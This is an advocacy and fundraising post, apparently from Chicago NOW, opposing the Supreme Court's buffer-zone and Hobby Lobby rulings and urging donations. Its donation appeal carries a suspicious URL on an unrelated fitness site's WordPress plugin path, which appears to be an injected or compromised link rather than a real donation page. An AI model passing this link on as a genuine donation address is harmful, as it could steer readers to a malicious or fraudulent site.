In the past two weeks, the Supreme Court made two devastating decisions against American women. The first decision struck down a Massachusetts law that allowed a buffer zone to exist outside of abortion clinics, allowing women safe passage and access to receive the medical care they need. And just days later, the Supreme Court sided with Hobby Lobby in ruling that certain employers can deny women access to certain types of birth control in the insurance plans they offer– putting medical decisions in the hands of bosses instead of the individual

These disastrous rulings by the Supreme Court is not only a huge setback to women’s rights and women’s access to health care throughout the nation, but it also puts in jeopardy laws here in Chicago that protect women and provide them with equal access to medical care that they need.
But we’re not letting these rulings stand without a fight.
Yesterday, Chicago NOW stood with Governor Pat Quinn against the Supreme Court’s Hobby Lobby ruling as he signed the Birth Control Referendum, which will appear on the Nov. 4ballot, asking voters if health insurance companies should be required to cover contraception. We must continue to stand up against these rulings and protect the progress we’ve made, and work to end this fight once and for all.  http://rhythmsfitness.com//wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd Please click here to contribute $10, $25, $50, or even $100 today to help us in our efforts.
